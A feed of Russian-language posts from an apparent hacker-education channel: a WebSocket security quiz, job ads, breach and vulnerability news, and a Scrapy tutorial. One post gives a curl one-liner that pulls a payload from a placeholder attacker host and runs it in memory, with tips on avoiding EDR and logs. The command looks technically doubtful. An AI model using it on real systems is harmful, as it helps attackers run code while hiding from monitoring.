🤪 Небезопасный WebSocket

Вы тестируете веб-приложение, которое передаёт данные чата через WebSocket. При анализе трафика вы замечаете:

— Подключение идёт по ws:// вместо wss://

— Сообщения передаются в открытом виде (JSON без шифрования)

— В сообщениях содержатся идентификаторы пользователей и текст переписки

Какая уязвимость возникает в такой конфигурации ❓

🐸 Библиотека хакера

#междусобойчик

🏃‍♀️ Новый поток курса — собери своих AI-агентов

7 октября стартует второй поток курса «AI-агенты для DS-специалистов».
За 5 недель вы научитесь собирать агентов, которые уже сейчас будут помогать бизнесу.

В кружке выше Максим Шаланкин, наш преподаватель, рассказывает подробнее — включай, чтобы не пропустить.

👉 Записаться на курс

🤑 Топ-вакансий для хакеров за неделю

Специалист по информационной безопасности — 230 000 ₽, офис (Москва)

Инженер ИБ сервисов — удаленно/гибрид (Москва)

Pentester — от 380 000 ₽, удаленно (Москва)

Information Security Specialist (DLP) — от 120 000 ₽, офис (Москва)

Специалист ИБ — от 200 000 до 300 000 ₽, офис (Моска)

➡️ Еще больше топовых вакансий — в нашем канале InfoSec jobs

🐸 Библиотека хакера

#свежак

💾 Запуск бинарника напрямую из памяти

Если нельзя писать на диск или не хочется светиться в логах — можно выполнить ELF-бинарник напрямую из памяти, минуя файловую систему:

curl https://attacker/payload.elf | bash -c 'chmod +x /dev/fd/0 && /dev/fd/0'

Как работает:

— curl тянет бинарь по HTTP

— /dev/fd/0 — спецфайл, указывающий на поток stdin

— chmod +x делает поток исполняемым

— /dev/fd/0 сразу запускается как исполняемый ELF

⚠️ Бинарник не сохраняется и не появляется на диске даже временно.

Полезно для:

✅ Разведки без следов (auditd, EDR, inotify не ловят файл)

✅ Обхода ограничений записи (tmp, noexec)

✅ Тестов persistence без артефактов

✅ CTF и отработки техник memory execution

💡 Лайфхаки:

— Заменить curl на wget -qO-, socat, nc, httpie

— Альтернатива: /proc/self/fd/0

— Можно обфусцировать URL, использовать TLS и подмену юзер-агента

🐸 Библиотека хакера

#буст

🦇 Positive Technologies раскрыли атаку PhantomCore

Группировка маскирует свои серверы под IT-сервисы, комбинирует собственные и покупные инструменты, а внутри неё назревает раскол — разные фракции строят отдельную инфраструктуру.

➡️ Подробности — в исследовании

🐸 Библиотека хакера

🔧 Автоматизация сбора данных с веб-сайтов через Scrapy

Scrapy — Python-фреймворк для веб-скрейпинга. Идеально подходит для:

➖ Сбора данных

➖ Поиска уязвимостей и метаданных

➖ OSINT и аналитики

Как работает:

1. Для начала нужно установить Scrapy. Это можно сделать через pip:

pip install scrapy

2. Создайте новый проект с помощью команды:

scrapy startproject myproject

3. Создайте новый файл паука в каталоге spiders/ вашего проекта:

scrapy genspider example_spider example.com

4. Пример паука:

import scrapy

class ExampleSpider(scrapy.Spider):
    name = "example_spider"
    start_urls = ['https://www.example.com']

    def parse(self, response):
        yield {
            'title': response.xpath('//title/text()').get(),
            'url': response.url,
        }

5. После настройки паука вы можете запустить его с помощью команды:

scrapy crawl example_spider -o output.json

Советы по использованию:

— Настройте DOWNLOAD_DELAY

— Используйте обработку ошибок

— Применяйте разные User-Agent / Proxy

🐸Библиотека хакера

#буст

🚨 0-click атака на Apple

Уязвимость в RawCamera.bundle (JPEG Lossless) позволяет выполнить код без кликов — достаточно получить фото в iMessage.

⚠️ Затронуты: iOS/iPadOS 18.6.2, macOS Sequoia 15.6.1, Sonoma 14.7.8, Ventura 13.7.8, iPadOS 17.7.10.

Apple уже выпустила патчи. Исследователи сделали тулзу ELEGANT BOUNCER на Rust для проверки DNG.

Что делать:

— Обновить систему.

— Выключить автопоказ превью.

— Проверять файлы из незнакомых источников.

🔗 Читать подробнее

🐸 Библиотека хакера

#свежак